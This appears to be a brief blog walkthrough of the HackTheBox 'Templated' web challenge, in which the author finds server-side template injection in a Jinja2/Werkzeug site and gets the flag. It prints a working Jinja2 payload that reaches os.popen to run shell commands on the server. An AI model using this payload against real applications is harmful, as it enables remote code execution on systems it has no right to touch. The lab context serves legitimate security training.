Simple Web Challenge on HTB | Templated
Jan 22, 2023
Hey folks, here is a simple web challenge for you…
The name of the challenge is Templated.
Press enter or click to view image in full size![]()
Let’s start by opening the web interface.
We can see that the site uses python, let’s look bit more…
Press enter or click to view image in full size![]()
The web uses Werkzeug/1.0.1 Python/3.9.0.
While doing basic tests we got that the site is vulnerable to SSTI!! 😋
I quickly searched Google and came across Gus Ralph’s write-up on Server Side Template Injection with Jinja2.
Let’s Exploit!!
Exploitation part is very basic.
Payload =
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
Press enter or click to view image in full size![]()
Let’s try listing files.
Press enter or click to view image in full size![]()
We found the flag.txt!! Read the file to get the flag.
Press enter or click to view image in full size![]()
Yeahhyy!!💥We got the flag!!!
That way a simple SSTI challange!! Try it yourself ❤